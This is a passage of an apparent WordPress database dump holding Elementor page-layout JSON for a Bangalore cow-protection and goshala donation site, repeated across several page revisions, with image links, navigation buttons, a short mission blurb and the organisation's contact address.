com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}],\"autoplay_speed\":1000},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ba24d1d\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"background_background\":\"slideshow\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/values.png\",\"id\":1654,\"alt\":\"\",\"source\":\"library\"},\"background_slideshow_gallery\":[{\"id\":1577,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK55.png\"},{\"id\":1544,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/gopalak-B1-copy.jpg\"}],\"padding\":{\"unit\":\"px\",\"top\":\"150\",\"right\":\"0\",\"bottom\":\"0150\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5007eb7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c7f7d6b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"0\",\"bottom\":\"-10\",\"left\":\"-10\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" #800 Spandana towers\\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: namaste@gopalak.in\\n\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(11091,1844,'_elementor_page_assets','a:0:{}'),(11094,1845,'_elementor_edit_mode','builder'),(11095,1845,'_elementor_template_type','wp-page'),(11096,1845,'_elementor_version','3.7.8'),(11097,1845,'_wp_page_template','elementor_canvas'),(11098,1845,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/logo1211.png\",\"id\":1615,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"75\",\"height\":\"75\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4613375\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"36373ca\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"574c840\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"structure\":\"20\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Frame.png\",\"id\":1693,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-3\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"84647ad\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"4e75547\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1690,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2602864-scaled.jpg\"},{\"id\":1689,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kat-smith-735976-scaled.jpg\"},{\"id\":1691,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2252557-scaled.jpg\"},{\"id\":1741,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-min-an-1455455-scaled.jpg\"},{\"id\":1742,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-roman-odintsov-8747798-scaled.jpg\"},{\"id\":1687,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kelly-2881385-scaled.jpg\"}],\"thumbnail_size\":\"full\",\"slides_to_show\":\"1\",\"navigation\":\"none\",\"autoplay_speed\":1000,\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"12\",\"bottom\":\"-21\",\"left\":\"-12\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false},{\"id\":\"0468eb3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73700aa\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":975,\"sizes\":[]},\"structure\":\"20\"},\"elements\":[{\"id\":\"f55311d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"8ea7d73\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/depositphotos_12743475-stock-photo-farm-cattle.webp\",\"id\":1567,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Adopt\\/Donate\",\"description_text\":\"You can donate any amount of your choice which will be used for fodder to feed cows.\\n\\n\\n\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"d6c2143\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5bb322c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9ea7478\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\",\"id\":1340,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Shop With Us\",\"description_text\":\"\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\",\"thumbnail_custom_dimension\":{\"width\":\"600\",\"height\":\"400\"}},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"cc6e4e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#264D5D\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#324735\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}],\"autoplay_speed\":1000},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ba24d1d\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"background_background\":\"slideshow\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/values.png\",\"id\":1654,\"alt\":\"\",\"source\":\"library\"},\"background_slideshow_gallery\":[{\"id\":1577,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK55.png\"},{\"id\":1544,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/gopalak-B1-copy.jpg\"}],\"padding\":{\"unit\":\"px\",\"top\":\"150\",\"right\":\"0\",\"bottom\":\"0150\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5007eb7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c7f7d6b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"0\",\"bottom\":\"-10\",\"left\":\"-10\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" #800 Spandana towers\\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: namaste@gopalak.in\\n\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(11099,1845,'_elementor_page_assets','a:0:{}'),(11101,1846,'_elementor_edit_mode','builder'),(11102,1846,'_elementor_template_type','wp-page'),(11103,1846,'_elementor_version','3.7.8'),(11104,1846,'_wp_page_template','elementor_canvas'),(11105,1846,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/logo1211.png\",\"id\":1615,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"75\",\"height\":\"75\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4613375\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"36373ca\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My 